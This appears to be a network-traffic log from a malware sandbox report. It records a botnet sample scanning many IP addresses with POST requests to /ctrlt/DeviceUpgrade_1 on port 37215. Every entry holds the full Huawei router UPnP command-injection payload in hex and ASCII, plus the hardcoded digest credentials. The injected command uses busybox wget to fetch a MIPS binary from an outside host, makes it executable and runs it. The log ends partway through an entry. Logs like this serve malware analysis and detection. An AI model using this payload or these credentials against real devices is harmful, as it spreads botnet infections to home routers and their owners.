3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1027192.168.2.1347872157.245.81.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430650949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1028192.168.2.1342500176.135.149.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430669069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1029192.168.2.134465841.15.136.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430702925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1030192.168.2.135327644.88.33.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430718899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1031192.168.2.1349246157.26.102.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430721045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1032192.168.2.1339230197.19.140.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430756092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1033192.168.2.135148250.112.116.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430756092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1034192.168.2.1333764157.242.249.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430773020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1035192.168.2.1354854104.175.75.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431226969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1036192.168.2.135176241.179.205.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431229115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1037192.168.2.134128479.165.202.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431262970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
